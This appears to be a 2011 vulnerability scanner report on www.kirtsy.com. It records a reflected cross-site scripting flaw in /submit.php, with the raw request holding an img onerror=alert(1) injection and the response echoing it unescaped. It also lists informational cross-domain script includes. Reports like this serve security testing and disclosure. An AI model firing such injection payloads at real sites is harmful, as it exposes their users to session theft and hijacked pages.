1. Cross-site scripting (reflected)
2. Cross-domain script include
Severity: | High |
Confidence: | Certain |
Host: | http://www.kirtsy.com |
Path: | /submit.php |
GET /submit.php?fc309"><img%20src%3da Host: www.kirtsy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 14:14:12 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.13 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 20799 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="hidden" name="return" value="/submit.php?fc309\"><img src=a onerror=alert(1) ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.kirtsy.com |
Path: | /a |
GET /a HTTP/1.1 Host: www.kirtsy.com Proxy-Connection: keep-alive Referer: http://www.kirtsy.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: mobify=0 |
HTTP/1.1 404 Not Found Date: Sun, 17 Apr 2011 14:21:51 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.13 X-Powered-By: PHP/5.2.13 Content-Type: text/html Content-Length: 19540 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <!-- FM Medium Rectangle Zone --> <script type='text/javascript' src='http://static.fmpub ...[SNIP]... <!-- FM Wide Skyscraper Zone --> <script type='text/javascript' src='http://static.fmpub ...[SNIP]... <link href="https://youdata <script src='https://youdata ...[SNIP]... <!-- FM Leaderboard Zone --> <script type='text/javascript' src='http://static.fmpub ...[SNIP]... <!-- FM Tracking Pixel --> <script type='text/javascript' src='http://static.fmpub ...[SNIP]... <!-- Start Quantcast tag --> <script type="text/javascript" src="http://edge ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.kirtsy.com |
Path: | /modules/niftycube/js |
GET /modules/niftycube/js Host: www.kirtsy.com Proxy-Connection: keep-alive Referer: http://www.kirtsy.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 14:21:46 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.13 Last-Modified: Sun, 28 Dec 2008 05:32:24 GMT ETag: "1f78266-21ef-45f14a Accept-Ranges: bytes Content-Length: 8687 Content-Type: application/javascript /* Nifty Corners Cube - rounded corners with CSS and Javascript Copyright 2006 Alessandro Fulciniti (a.fulciniti@html.it) This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the Licens ...[SNIP]... |